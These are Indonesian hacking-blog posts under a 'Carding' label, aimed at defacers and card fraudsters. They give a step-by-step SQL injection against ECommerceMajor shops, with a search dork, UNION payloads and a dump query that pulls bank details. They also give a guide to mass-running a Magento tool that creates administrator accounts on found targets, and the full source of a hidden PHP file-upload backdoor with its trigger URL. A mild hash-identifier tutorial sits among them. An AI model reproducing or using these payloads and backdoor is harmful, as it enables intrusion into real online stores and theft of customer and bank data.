Tampilkan postingan dengan label Carding. Tampilkan semua postingan
Tampilkan postingan dengan label Carding. Tampilkan semua postingan

Jumat, 17 Februari 2017

ECommerceMajor SQL Injection Vulnerability


Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Website dengan eXploit ECommerceMajor SQL Injection Vulnerability.

cielahh kalo baca/ denger kata yang berbau E-Commerce biasanya para kardiman pada merapat nih awkkw.
yoi E Commerce Major ini salah satu platforms utk online business, kemungkinan besar semua website online shop :D

hadeh dump dump dump akwkkakw.
Happy Injector, kuy langsung disimak.


#Exploit Author : Rahul Pratap Singh
#Date           : 13/Dec/2015
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Website        : 0x62626262.wordpress.com
#Linkedin       : https://in.linkedin.com/in/rahulpratapsingh94

Dork : inurl:/productdtl.php site:.

eXploit : productdtl.php?prodid=<SQLI>

1. pertama kita cari target menggunakan dork diatas.
Setelah kita mendapatkan target, lakukan tes untuk mengetahui vuln atau tidak menggunakan
contoh : 127.0.0.1/productdtl.php?prodid=1


2. coba kita balance dengan +--+
contoh :  127.0.0.1/productdtl.php?prodid=1+--+


3. jika halaman menjadi seperti semula, berarti balance sukses

coba kita menghitung jumlah column nya dengan menggunakan order by

contoh :  
127.0.0.1/productdtl.php?prodid=1+order+by+1--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+2--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+3--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+10--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+11--+error, berarti jumlah columnnya 10.

sekarang kita cari angka ajaibnya menggunakan union select

contoh :
127.0.0.1/productdtl.php?prodid=-1+union+select+1,2,3,4,5,6,7,8,9,10--+


4. nah angka ajaibnya muncul, sekarang kita dump menggunakan DIOS nya mas madblood

contoh: 127.0.0.1/productdtl.php?prodid=1+productdtl.php?prodid=-2+union+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10--+


5. nah muncul kan? Tuh liat ada data bank juga xixixixi
sekarang kita coba dump lagi data datanya xixixix

contoh :
127.0.0.1/productdtl.php?prodid=-2+union+select+1,group_concat(bnk_title,0x3a,bnk_name,0x3a,bnk_br,0x3a,bnk_city),3,4,5,6,7,8,9,10 from cp_info--+


tuh keluarkan data datanya? Xixixix

Artikel Tutorial yang ada diBlog ini hanya untuk pembelajaran ya kak, jadi segala perbuatan yang Lu lakukan, semua di tanggung sang pembaca.
Kami tidak bertanggung jawab setidikpun, kami Hanya membantu para pembaca yang pemula seperti kami, jadi jangan banyakin Drama gak jelas wkwkwk.
Kalo ada pertanyaan silahkan ke fanspage atau Official Account Line kami.

happy hacking SQL Injection guys :)

3xBitCh








Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Minggu, 29 Mei 2016

Tutorial Identifikasi Tipe HASH dengan HASH-IDENTIFIER


Hello World ; Sore Fans, Please Say Hello Haters :*
Kali ini gue bakal Share, Tutorial Identifikasi Tipe HASH dengan HASH-IDENTIFIER Di Linux, apa sih itu Hash o.O ? gue yakin lu lu pada dh tauu wkwk. ape lagi yg sering bergelut di dunia cyber dan tool ini membantu banget diDunia perjembutan sekarang.
disini gua mempraktekannya di Kali Linux, silahkan cobain sendiri di Distro2 kesayangan anda :p wkwkw

Langsung intip Tutorial Bebz ;*


Hash-ID Mendukung berbagai Format Hash :
ADLER-32
CRC-32
CRC-32B
CRC-16
CRC-16-CCITT
DES(Unix)
FCS-16
GHash-32-3
GHash-32-5
GOST R 34.11-94
Haval-160
Haval-192 110080 ,Haval-224 114080 ,Haval-256
Lineage II C4
Domain Cached Credentials
XOR-32
MD5(Half)
MD5(Middle)
MySQL
MD5(phpBB3)
MD5(Unix)
MD5(Wordpress)
MD5(APR)
Haval-128
MD2
MD4
MD5
MD5(HMAC(Wordpress))
NTLM
RAdmin v2.x
RipeMD-128
SNEFRU-128
Tiger-128
MySQL5 - SHA-1(SHA-1($pass))
MySQL 160bit - SHA-1(SHA-1($pass))
RipeMD-160
SHA-1
SHA-1(MaNGOS)
Tiger-160
Tiger-192
md5($pass.$salt) - Joomla
SHA-1(Django)
SHA-224
RipeMD-256
SNEFRU-256
md5($pass.$salt) - Joomla
SAM - (LM_hash:NT_hash)
SHA-256(Django)
RipeMD-320
SHA-384
SHA-256
SHA-384(Django)
SHA-512
Whirlpool
And more…

Penggunaan Hash - Identifier

- BackBox User : buka terminal ketik : hash-id
- Kali Linux User : buka terminal ketik : hash-identifier
- Distro Lain/Windows : Buka CMD  ketik : python Hash_ID_v1.1.py

Note: Jika Belum punya tool hash-id bisa download di  Hash-ID

Percobaan Identifikasi Hash ( Result MD5 )
Nue membuat tutorial ini karena banyak nya yang menanyakan ini tipe hash apa dll ..
Untuk Selebihnya silahkan explore sendiri, xixixhi semoga membantu diDunia Perjembutan Mu ;3

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")



Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy GNU/Linux
Sekian dan semoga bermanfaat .. terimakasih



Source and Thanks to: Dompu Linuxer



./Nuenomaru


cuma sekumpulan n00b Penikmat GNU/Linux







Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Jumat, 20 Mei 2016

Tutorial Magento Add Administrator Mass Exploiter V.3

Hello World; Pagi Fans, Please Say Hello Haters :*
xixixhi, kali ini gue akan Share salah satu Bug/Celah pada salah satu CMS eCommerce, yaitu CMS Magento, menggunakan Teknik Add Administrator.
xixixhi, biasanya para Kardiman dan sesepuh Dispenser yang biasa maen Log $_$ , bakal suka nih ama yang berbau cms eshop komersial >.<" akwkwak
Sebelumnya kami berterimakasih kepada Mas Hydra dari stupidc0de family, yang telah mengizinkan kami mempost tool buatan Mas Hydra di Blog TKJ Cyber Art.


Lanjut intip tutornya ;*
1. Download script nya disini Back up link

(setelah di download, simpan file dgn ekstensi .php )
penampakan tool ~


Dork:
store/index.php/checkout/cart
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

2. Dorking di Search Engine
3. karna ini tool Mass Exploiter, silahkan kumpulkan target2 yang menggunakan CMS Magento, biar nanti si tool yang akan mengEksekusi

4. Masukan tool mass exploiter yang tadi sudah di download, taruh di folder C:/xampp/php
5. lalu masukan list target ke notepad, dan save ke folder C:/xampp/php
6. ketikan perintah:

cd C:/xampp/php
php namafiletadi.php listtarget.txt



Jika Sukses, akan terlihat seperti di SS.
Kita coba langsung ke page admin Loginnya: target.coli/admin


Login menggunakan user dan psswd yg nampak di terminal, itu sudah auto dibuat oleh tool.
Dan #~BooM



Xihihi, sekian sedikit penjelasan pada bug CMS Magento, dan cara pemakaian tools[PHP] Magento Add Administrator Mass Exploiter V.3
$_$ untuk selanjutnya silahkan kreasikan sendiri <(") $_$

Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Magento Hacked~
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: PRINGSEWUDEV | Hydra | Stupidc0de Family
#keepsolid br0 ;D



./Nuenomaru





dan senyuman itu, masih selalu menenangkan Ku :'D








Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Minggu, 28 Februari 2016

WASPADA KALIAN YANG MEMPUNYAI CHECKER & PHISING ADA HIDDEN UPLOADER

Hallo fans .-. Nuenomaru disini .
cieelah dah lama gak posting, postingan sebelumnya di isi sama si Om OepilCore dan abang Calcune_System.
okeii kalii ini Nuenomaru akan bahas Tentang Script Hidden Uploader & Cara Patch nya .
sebenernya sih kasus web phising milik attacker, dan web checker milik para kardiman yang dari dlu alus2 aja eh tiba2 bisa di deface oleh depeser :v awkakwka.
yupz, itu karna sebagian dari mereka tak menyadari ada Hidden Uploader di web yang mereka buat :3 *entah itu hosting gratisan atau berbayar, tpi disalahsatu script trdapat hidden uploadernya.
cukup pembahasannya ;)

Lanjootz aja gans

apa itu hidden uploader? , hidden uploader adalah uploader tersembunyi. fungsi dari hidden uploader adalah sudah pasti untuk mengupload macam2 file termasuk juga backdoor/shell :D

<?php
if
(isset
(
$_REQUEST[$browser=$x=strlen("Chrome") . strlen("Mozila")]) && 
$_REQUEST[$x=strlen("Chrome") . strlen("Mozila")]=="browser")
{
echo "<h2></h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\"></label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br /><br />
<input type=\"submit\" name=\"default\" value=\"Upload\">
</form>";

{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo "Rand(100-100): " . "" . $_FILES["file"]["name"];
echo"<hr>";
}
}
?> 

Cara menggunakan :
1. Copy script diatas.
2. Pastekan ke notepad dan save dengan format .php contoh : "hidden.php" dan simpan di localhost.

3. cara menjalankan script tersebut hidden.php?66=browser

penampakan hidden uploader :3


Lalu gimana cara patch nya x_O ????

penampakan source code sebelum di patch:


Biasanya kode itu oleh si pembuat checker di sisipkan di index.php maupun function.php. Saran saya adalah sebelum mengeshare checker sobat sebaiknya di delet itu hidden uploader soalnya sangat berbahaya! kalau sampek adat angan iseng nah anda lupa backup ancur hidup anda. nah atau dengan cara di patch seperti saya dengan menambahkan kode seperti ini:




Mudahkan o.O ?

Stay Cool and Keep ./Crotz , gaes :'v

Sekian tutorial sederhana di postingan ringan kali ini xixixhi.
sampai ketemu di next tutorial dgn Nue lagi ;)

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy patching~
Sekian dan semoga bermanfaat .. terimakasih




refrensi: touch me senpai :')




./Nuenomaru




Nuenomaru just an illusion in Cyber World




















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
 

ande ande lumoet Template by Ipietoon Cute Blog Design